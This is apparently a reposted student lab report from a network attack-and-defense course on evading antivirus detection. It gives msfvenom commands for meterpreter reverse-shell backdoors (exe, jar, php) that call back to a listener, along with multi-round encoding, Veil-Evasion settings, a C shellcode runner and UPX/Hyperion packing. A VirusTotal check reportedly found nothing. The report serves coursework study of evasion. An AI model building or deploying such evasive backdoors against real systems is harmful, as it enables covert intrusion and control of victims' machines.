2. 程式人生 > >20164317《網絡對抗技術》Exp3 免殺原理與實踐

20164317《網絡對抗技術》Exp3 免殺原理與實踐

阿新 發佈:2019-04-01
實驗中遇到的問題 不同的 靜默安裝 組合 alt ping 程序 upx 上一個

一、實驗要求

1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其他文件(0.5分),veil-evasion(0.5分),加殼工具(0.5分),使用shellcode編程(1分)

1.2 通過組合應用各種技術實現惡意代碼免殺(0.5分) (如果成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖。

1.3 用另一電腦實測,在殺軟開啟的情況下,可運行並回連成功,註明電腦的殺軟名稱與版本(加分0.5)

二、實驗內容

任務一:正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工具或技巧;

1、使用msf編碼器

通過上個實驗中學到的命令生成後門程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 1.115 LPORT=4317 -f exe > met.exe

技術分享圖片

將生成的程序上傳到virus total試試結果

技術分享圖片

使用msf編碼器對後門程序編碼10次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.115 LPORT=4317 -f exe > met-encoded10.exe

技術分享圖片

再上傳到virus total試試免殺操作是否有效

技術分享圖片

2、使用msfvenom生成jar

使用Java後門程序生成命令

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.115 lport=4317 x> 20164317_backdoor_java.jar
3、使用msfvenom生成php

使用php後門程序生成命令
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.115 lport=4317 x> 20164317_backdoor.php

技術分享圖片

4、使用veil-evasion

設置veil

use evasion

use 7

set LHOST 192.168.1.115

set LPORT 4317

技術分享圖片

然後輸入後門程序的文件名

技術分享圖片

於是把它掛上virus total看看表現如何

技術分享圖片

利用shellcode編程

  • 先執行shellcode生成命令
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.115 LPORT=4317 -f c
  • 得到shellcode

技術分享圖片

任務二:Linux平臺交叉編譯Windows應用

1、使用交叉編譯

新建.c文件,將shellcode和c代碼組合到一起

技術分享圖片 
vim 4317met.c

unsigned char buf[] =

將shellcode替換到此處

int main()

{

    int (*func)() = (int(*)())buf;

    func();

}
技術分享圖片

執行

i686-w64-mingw32-g++ 4317met.c -o 4317met.exe

編譯成exe文件

技術分享圖片

然後把它掛上virus total測一下,沒查出來

技術分享圖片

技術分享圖片

加壓縮殼

1 upx 4323.exe -o cal_4317.exe

技術分享圖片

技術分享圖片

使用加密殼(Hyperion)

將上一個生成的文件拷貝到/usr/share/windows-binaries/hyperion/目錄中

進入目錄/usr/share/windows-binaries/hyperion/中

輸入命令

wine hyperion.exe -v 4317_upxed.exe 4317_upxed_hyperion.exe

進行加殼

技術分享圖片

實現免殺

技術分享圖片

技術分享圖片

任務三:用另一電腦實測,在殺軟開啟的情況下,可運行並回連成功,註明電腦的殺軟名稱與版本

實驗環境:被控機是win7虛擬機,裝有金山毒霸
(我保留了用vs編譯的最初c+shellcode版本,以及在此基礎上加壓縮殼的版本、再加加密殼的版本。一共三個版本,回連失敗)

  • 本機打開msf控制臺,開始監聽
  • 受控機運行後門程序
  • 版本號
  • 技術分享圖片

    三、基礎問題回答

    1、殺軟是如何檢測出惡意代碼的?

  • 特征碼掃描
  • 啟發式掃描
  • 虛擬機技術
  • 主動防禦技術
  • 自免疫技術

  • 2、免殺是做什麽的?

    使惡意代碼逃過殺毒軟件的查殺

    3、免殺的基本方法有哪些?

  • msfvenom直接生成
  • msfvenom編碼一次
  • msfvenom多次編碼
  • veil-evasion
  • 半手工生成shellcode
  • 加殼(壓縮殼,加密殼)

  • 4、開啟殺軟能絕對防止電腦中惡意代碼嗎?

    當然不行,即便是開始直接生成的後門程序測試中也有殺軟找不出來呢。

    四、實驗中遇到的問題

    1安裝veil-evasion過程中出現很多彈窗提示你安裝,但是裏面的字卻又是方框,編碼錯誤顯示不出來。
    解決:在安裝之除就選擇s靜默安裝,一切由系統自己設置安排。
    2虛擬機ping不通別的實體機
    解決:把虛擬機網卡設置改為橋接模式就可以了

  • 五、實驗總結與體會

    此次實驗讓我對免殺技術有了新的認識,比如通過不同的編程語言重寫、多次編碼等,都是十分新鮮的東西。不過也讓我認識到安裝殺軟有時候可能並沒有什麽用,它只能按照已有的特征碼或者比較有效的啟發式鑒別木馬和後門程序,雖然病毒庫隨時都在更新,但像實驗中剛做出來的後門程序肯定不在病毒庫之列,於是它就可以為所欲為。本次實驗難度比較大,嘗試了很多方法也沒法實現,殺毒軟件的功能還是很強的,很多次嘗試都沒有成功,推測還是shellcode出問題了。

20164317《網絡對抗技術》Exp3 免殺原理與實踐

相關推薦

20154307《對抗Exp3 原理實踐

mark 我們 blocks 意思 釣魚 class 做了 更改權限 asio 20154307《網絡對抗》Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測:殺毒軟件檢測到有程序包含的特征碼與其特征碼庫的代碼相匹配,就會把該程

20155232《對抗Exp3 原理實踐

分享圖片 alt 特征碼 apt 基本 什麽 簡單介紹 主機 介紹 20155232《網絡對抗》Exp3 免殺原理與實踐 問題回答 1.基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測 特征碼:一段特征碼就是一段或多段數據。 如果一個可執行文件(或其

20155338《對抗Exp3 原理實踐

調用 編寫 上傳 權限 免殺 編譯運行 tcp 檢查 語言 20155338《網絡對抗》Exp3 免殺原理與實踐 實驗過程 一、免殺效果參考基準 Kali使用上次實驗msfvenom產生後門的可執行文件,上傳到老師提供的網址http://www.virscan.org/上進

20155217《對抗》Exp03 原理實踐

pre 使用 程序 use cnblogs 多次 scan www. 變化 20155217《網絡對抗》Exp03 免殺原理與實踐 實踐內容 正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工

2018-2019-2 對抗技術 20165230 Exp2 後門原理實踐

ping 反向連接 後門 操作 netcat 方式 拍照 art 基本 目錄 1.實驗內容 2.基礎問題回答 3.常用後門工具實踐 3.1netcat 3.

2018-2019-2 對抗技術 20165231 Exp2 後門原理實踐

class 一個 打開 功能 目標 rontab head 定時任務 con 實驗內容 1.使用netcat獲取主機操作Shell,cron啟動 2.使用socat獲取主機操作Shell, 任務計劃啟動 3.使用MSF meterpreter(或其他軟件)生成可執

2018-2019-2 20165331《對抗技術》Exp2 後門原理實踐

ima 例如 pty 並運行 art 就是 輸入 options lin 2018-2019-2 20165331《網絡對抗技術》Exp2 後門原理與實踐 實驗收獲與感想 通過本次實驗,我對後門的生成及工作原理有了更深的理解,也學會了怎樣用後門攻擊同一網段下的不同主機。但是

20164317對抗技術Exp3 原理實踐

實驗中遇到的問題 不同的 靜默安裝 組合 alt ping 程序 upx 上一個 一、實驗要求 1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其他文件(0.5分),veil-evasion(0.5分),加殼工具(0.5分),使用shellco

2017-2018-4 20155317《對抗技術EXP3 原理實踐

運行 log jar idt 連通 進行 all 結果 暫時 2017-2018-4 20155317《網絡對抗技術》EXP3 免殺原理與實踐 一、問題回答 (1)殺軟是如何檢測出惡意代碼的? (2)免殺是做什麽? (3)免殺的基本方法有哪些? 2.實踐 (1) 正確

2018-2019-2 對抗技術 20165311 Exp3 原理實踐

col eno 比較 encode var 針對 name -s cnblogs 2018-2019-2 網絡對抗技術 20165311 Exp3 免殺原理與實踐 免殺原理及基礎問題回答 實驗內容 任務一:正確使用msf編碼器,msfvenom生成如j

2018-2019-2 對抗技術 20165334 Exp3 原理實踐

語言 保護 r文件 原理 添加 ima port 復制 png 2018-2019-2 網絡對抗技術 20165334 Exp3 免殺原理與實踐 一、實驗內容 任務一正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,利用shellc

2018-2019-2 對抗技術 20165210 Exp3 原理實踐

問題 網站 丟失 其他 圖片 https 壓縮包 exe 生成 2018-2019-2 網絡對抗技術 20165210 Exp3 免殺原理與實踐 免殺的概述 免殺,也就是反病毒(AntiVirus)與反間諜(AntiSpyware)的對立面,英文為Anti-AntiViru

2018-2019-2 對抗技術 20165326 Exp3 原理實踐

log ant tool 能夠 校驗和 nco bin .html 錯誤代碼 免殺原理與實踐 目錄 知識點問答 實踐內容 遇到的問題 心得體會 知識點 meterpreter免殺 基礎問題回答 殺軟是如何檢測出惡意代碼的? 特征碼(基於簽名):模式匹配,比對特

20165214 2018-2019-2 《對抗技術Exp3 原理實踐 Week5

實現 進行 中間 信息 失敗 中一 網絡安全 需要 識別 《網絡對抗技術》Exp3 免殺原理與實踐 Week5 一、實驗內容 1、正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,加殼工具,使用shellcode編程; 2、通過組

對抗 Exp3 原理實踐 20154311 王卓然

下載軟件 get 改變 網站 加密 純手工 com 代碼 操作模式 Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? ①基於特征碼的檢測:AV軟件廠商通過檢測一個可執行文件是否包含一段與特征碼庫中相匹配的特征碼從而判斷是

# 2018-2019-2 《對抗技術》Exp2 後門原理應用 20165210

啟動組 and 攝像頭 完成 lis 準備就緒 下載文件 list ont 2018-2019-2 《網絡對抗技術》Exp2 後門原理與應用 20165210 實驗內容: 使用netcat獲取主機操作Shell,cron啟動。 使用Socat獲取主機操作Shell,任務計

Exp3 原理實踐20154302薛師凡

代碼 AR 軟件 可執行文件 別了 模板生成 倒序 即使 get Exp3 免殺原理與實踐20154302薛師凡 一、實踐目標與內容 利用多種工具實現實現惡意代碼免殺 在另一臺電腦上,殺軟開啟的情況下,實現運行後門程序並回連成功。 在保證後門程序功能的情況下實現殺軟共存。

Exp3 原理實踐

asi 目標 專業 http lac 基礎 put 源文件 是個 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? -檢測特征碼 -基於行為檢測 -啟發式檢測類似 (2)免殺是做什麽? 使惡意軟件不被AV檢

20155202張旭 Exp3 原理實踐

ever 難受 virus 分片 告訴 kali 基於 文件夾 梳理 20155202張旭 Exp3 免殺原理與實踐 AV廠商檢測惡意軟件的方式主流的就三種: 基於特征碼的檢測 啟發式惡意軟件檢測 基於行為的惡意軟件檢測 我們要做的就是讓我們的惡意軟件沒法被這三種方式找到

20155320 Exp3 原理實踐

可執行 惡意代碼 執行 AR 後門 lock 函數 工具 文件復制 20155320 Exp3 免殺原理與實踐 免殺 一般是對惡意軟件做處理,讓它不被殺毒軟件所檢測。也是滲透測試中需要使用到的技術。 【基礎問題回答】 (1)殺軟是如何檢測出惡意代碼的? 1.通過行